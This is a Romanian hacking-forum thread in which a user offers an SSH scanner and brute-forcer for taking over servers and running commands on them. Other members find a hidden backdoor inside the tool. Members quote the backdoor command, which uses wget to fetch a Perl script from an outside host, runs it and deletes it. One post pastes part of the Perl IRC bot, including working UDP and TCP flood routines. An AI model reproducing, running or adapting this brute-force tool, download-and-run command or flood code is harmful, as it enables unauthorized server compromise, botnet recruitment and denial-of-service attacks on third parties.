halucin0g3n Posted July 1, 2014 Report Posted July 1, 2014 (edited) Salut, In ultimele zile am lucrat la un scanner & brute forcer ssh.Mi-a venit ideea cand am dat intamplator peste o sursa de pe net fulg.cIn fine, din codul sursa de la fulg.c, am ajuns sa schimb peste 90% din cod.In primul rand, scannerul permite executarea de comenzi pe serverele ghicite, in al doilea rand o sa mearga numai pe sisteme linux x64.Cum poti rula comanda de scan:./brute 800 -b 80.242 passfile 22 "uname -a" Uname -a este comanda rulata pe servere. Aveti grija la ghilimele ptr. comenzi mai lungi de un cuvant, unde exista spatii.Serverele sunt salvate in sparte.txt in formatul urmator:root:password 84.242.202.220:22 --> Linux OpenWrt 2.6.33.5 #631 Mon Jun 27 10:04:08 NOVST 2011 armv6l unknownUser:parola ip:port si rezultatul comenzii uname -aIn felul asta vom stii cu siguranta ce prindem, cand prindem. Deasemenea poate fi folosit ptr. a urca automat arhive, pornit aplicatii, etc pe serverele prinse, ideea este sa fiti inventiviAm inclus in arhiva si doua script-uri ptr. a fi mai usoara lucrarea cu scanner-ul.Avem: a si massEditam fisierul a ptr. a schimbat comanda de executat si rulam ./a ip.ip portPtr. scan pe clasa A avem fisierul mass pe care-l rulam ./mass a b port unde a = clasa a si b = clasa b de la care sa porneasca.Daca rulam ./mass 5 100 22 o sa ne scaneze 5.100, 5.101, 5.102 pana la 5.255Daca rulam ./mass 5 0 22 o sa ne scaneze 5.0, 5.1, 5.2 pana la 5.255Download // REMOVEDSucces! Edited July 3, 2014 by Nytro
.Breacker Posted July 1, 2014 Report Posted July 1, 2014 Foarte frumos ?i bun,mul?umim.Func?ioneaz? bine.
Sadiq Posted July 1, 2014 Report Posted July 1, 2014 (edited) La mine ./mass nu merge...Linux ***************** 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/LinuxDe fapt singura comanda care merge e asta:./brute 800 -b 80.242 passfile 22 "uname -a" Ma rog, schimb clasa b si scaneaza si pare ca incearca sa crackuiasca. vedem maine dimineata Edited July 1, 2014 by Sadiq
GarryOne Posted July 1, 2014 Report Posted July 1, 2014 Pune si tu, te rog, pe un filehosting decent.
halucin0g3n Posted July 1, 2014 Author Report Posted July 1, 2014 sadiq, mass e doar un script bash, modifica-l sa se potriveasca nevoilor tale. l-am facut la repezeala.. chiar nu e important
mrtornado Posted July 1, 2014 Report Posted July 1, 2014 halucin0g3n well done mate asteptam si eu unu bun de mult
halucin0g3n Posted July 1, 2014 Author Report Posted July 1, 2014 mersi, acum lucrez si la un vnc brute, intampin cateva belele cu socket-urile dar o sa-l fac si p-ala
mrtornado Posted July 1, 2014 Report Posted July 1, 2014 ce pot sa zic ... vnc bruteu meu e decent dar astept cu nerabdare sa-l vad si pe ala pm when it comes in case I miss it
Gio33 Posted July 1, 2014 Report Posted July 1, 2014 Esti sigur ca functioneaza corect threadurile ? eu oricat pun 10-800-2000 se misca la fel.In alta ordine de idei sper ca nu e vreun mailer / ftp / http sender prin el, n-am avut timp sa-l iau la puricat, vad totusi ca l-ai "pack-uit" cu UPX, ascunde ceva?
halucin0g3n Posted July 1, 2014 Author Report Posted July 1, 2014 (edited) merge. avea 3mb executabilul ca a fost compilat static cu toate librariile necesare ptr. portabilitate. Edited July 1, 2014 by halucin0g3n
Gio33 Posted July 3, 2014 Report Posted July 3, 2014 cd /var/tmp;mkdir test; echo 'wget zobnet.go.ro/perl.pl Am gasit asta dupa unpack , BAN THIS MOFO. @Nytro
Nytro Posted July 3, 2014 Report Posted July 3, 2014 (edited) Firefox can't find the server at zobnet.go.ro.Da:cd /var/tmp;mkdir test; echo 'wget zobnet.go.ro/perl.plperl perl.plrm perl*rm a' > a; bash a &Pare backdoor. Asteptam un mesaj de la nenea de mai sus cu niste explicatii. Link removed. Edited July 3, 2014 by Nytro
Gio33 Posted July 3, 2014 Report Posted July 3, 2014 (edited) Poftim @resp) { $c++; chop $linha; sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); if ($c == "$linas_max") { $c=0; sleep $sleep; }}exit;}}}##############sub udpflooder {my $iaddr = inet_aton($_[0]);my $msg = 'A' x $_[1];my $ftime = $_[2];my $cp = 0;my (%pacotes); $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; return(undef) if $cp == 4;my $itime = time;my ($cur_time); while ( 1 ) {for (my $port = 1; $port <= 65000; $port++) { $cur_time = time - $itime;last if $cur_time >= $ftime; send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++; send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++; send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++; send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;for (my $pc = 3; $pc <= 255;$pc++) {next if $pc == 6; $cur_time = time - $itime;last if $cur_time >= $ftime; socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;}}last if $cur_time >= $ftime;}return($cur_time, %pacotes);}##############sub tcpflooder {my $itime = time;my ($cur_time);my ($ia,$pa,$proto,$j,$l,$t); $ia=inet_aton($_[0]); $pa=sockaddr_in($_[1],$ia); $ftime=$_[2]; $proto=getprotobyname('tcp'); $j=0;$l=0; $cur_time = time - $itime;while ($l<1000){ $cur_time = time - $itime;last if $cur_time >= $ftime; $t="SOCK$l"; socket($t,PF_INET,SOCK_STREAM,$proto); connect($t,$pa)||$j--; $j++;$l++;} $l=0;while ($l<1000){ $cur_time = time - $itime;last if $cur_time >= $ftime; $t="SOCK$l";shutdown($t,2); $l++;}}##############sub msg { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]");}sub ctcp { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :\001$_[1]\001");}sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");}sub op { return unless $#_ == 1; sendraw("MODE $_[0] +o $_[1]");}sub deop { return unless $#_ == 1; sendraw("MODE $_[0] -o $_[1]");}sub voice { return unless $#_ == 1; sendraw("MODE $_[0] +v $_[1]");}sub devoice { return unless $#_ == 1; sendraw("MODE $_[0] -v $_[1]");}sub j { &join(@_); }sub join { return unless $#_ == 0; sendraw("JOIN $_[0]");}sub p { part(@_); }sub part {sendraw("PART $_[0]");}sub nick { return unless $#_ == 0; sendraw("NICK $_[0]");}sub quit { sendraw("QUIT :$_[0]"); exit;}sub modo { return unless $#_ == 0; sendraw("MODE $_[0] $_[1]");}sub mode { modo(@_); }sub invite { return unless $#_ == 1; sendraw("INVITE $_[1] $_[0]");}sub topico { return unless $#_ == 1; sendraw("TOPIC $_[0] $_[1]");}sub topic { topico(@_); }sub away { sendraw("AWAY $_[0]");}sub back { away(); }}######################## END ######################## Edited July 3, 2014 by Gio33
Nytro Posted July 3, 2014 Report Posted July 3, 2014 Da, este backdoor. @halucin0g3n aka Castiel, asteptam niste explicatii.
Ganav Posted July 3, 2014 Report Posted July 3, 2014 Nu cred ca va da explicatii. In acest caz se poate aplica direct ce scrie in regulamentul forumului. 1
Maximus Posted July 3, 2014 Report Posted July 3, 2014 @Nytro ; chiar n-ar trebui sa asteptam crezi ca-i prost sa dea reply ? si ce sa zica ? "vai, imi cer scuze, asta era arhiva pentru prietena mea"
Cryo Posted July 3, 2014 Report Posted July 3, 2014 Daca zobnet.go.ro nu este prezent acum nu inseamna ca domeniul nu este cumparat si ca centrul de comanda nu poate fi activat in viitor, sa speram ca avariile vor fi minime.
halucin0g3n Posted July 3, 2014 Author Report Posted July 3, 2014 bai, sincer nu stiu ce sa zic. nu vreau sa para nici ca ma trag pe cur, nici ca vezi doamne, ca stai asa ca nu-i asa, ca car ca mar. sincer, functia respectiva am folosit-o in testare. nu este activa, scannerul fo0loseste alta functie. imi cer mii de scuze.
halucin0g3n Posted July 3, 2014 Author Report Posted July 3, 2014 pot uploada o varianta fara functia respectiva, nu ca m-ar interesa ce zice x y z de pe forum, dar ma simt aiurea. varianta noua ia usere dintr-un fisier si parolele din altul, daca ajuta cu ceva...
-Immortal- Posted July 3, 2014 Report Posted July 3, 2014 pot uploada o varianta fara functia respectiva, nu ca m-ar interesa ce zice x y z de pe forum, dar ma simt aiurea. varianta noua ia usere dintr-un fisier si parolele din altul, daca ajuta cu ceva...
halucin0g3n Posted July 3, 2014 Author Report Posted July 3, 2014 immortal, jur ca te porti ca si cum m-ai fi angajat sa-ti scriu tie vreun cod si ca te-am dezamagit manca-ti-as.
halucin0g3n Posted July 3, 2014 Author Report Posted July 3, 2014 imi doresti moartea gen, ti-am ranit sentimentele
Elohim Posted July 3, 2014 Report Posted July 3, 2014 Pune sursa mai bine, nu 4 linii schimbate si recompilat.